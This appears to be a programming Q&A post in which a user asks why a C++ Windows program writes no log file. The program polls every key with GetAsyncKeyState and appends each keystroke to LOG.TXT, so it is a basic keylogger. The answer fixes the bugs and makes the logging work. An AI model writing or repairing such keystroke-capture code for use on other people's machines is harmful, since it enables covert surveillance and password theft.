# File input not working

Tags: file-io, fstream

I have this C++ program that will get key code and store it as a string in a text file. After I run the program the file is supposed to appear alongside my cpp file but I doesn't appear. I think is got to do with the Save function where the file input and output is happening. Does anyone notices any errors(I get none while compiling).

```
#include <iostream>
#include <Windows.h>
#include <Winuser.h>
#include <fstream>

using namespace std;

int Save (int Key_Stroke, char *file);

int main(){
char i;

while(1){
    for(i = 8; i <= 190; i++){
        if(GetAsyncKeyState(i) == -32767){
            Save(i, "LOG.TXT");
        }
    }
}

system("PAUSE");

return 0;
}

int Save (int Key_Stroke, char *file){

if((Key_Stroke == 1) || (Key_Stroke == 2) || (Key_Stroke == 5))

    return 0;

FILE *OUTPUT_FILE;

OUTPUT_FILE = fopen(file, "a+");

fprintf(OUTPUT_FILE, "%s", &Key_Stroke);

fclose(OUTPUT_FILE);

cout << Key_Stroke << endl;

return 0;
}
```

Answer (score 0):

When using C `fprintf` (this isn't typically used in C++, see [ofstream](http://www.cplusplus.com/doc/tutorial/files/)) you don't use reference operator `&` because you are passing value to function, not address. Also formatting string is wrong, you want to write int `%d`, not array of chars `%s` ([more here](http://www.cplusplus.com/reference/cstdio/fprintf/))

Your `Save` function should look like

```
int Save(int Key_Stroke, const char *file)
{
    if((Key_Stroke == 1) || (Key_Stroke == 2) || (Key_Stroke == 5))
        return 0;

    FILE *OUTPUT_FILE = fopen(file, "a+");

    if(OUTPUT_FILE != NULL)
    {
        fprintf(OUTPUT_FILE, "%d", Key_Stroke);
        fclose(OUTPUT_FILE);
    }

    cout << Key_Stroke << endl;

    return 0;
}
```

Also notice `const` keyword in second argument of the function. This should be used to avoid writing to constant area of memory - directly written array of chars `"LOG.TXT"` .

Next thing, you should always check if the file you are trying to write to is correctly opened `if(OUTPUT_FILE != NULL)` .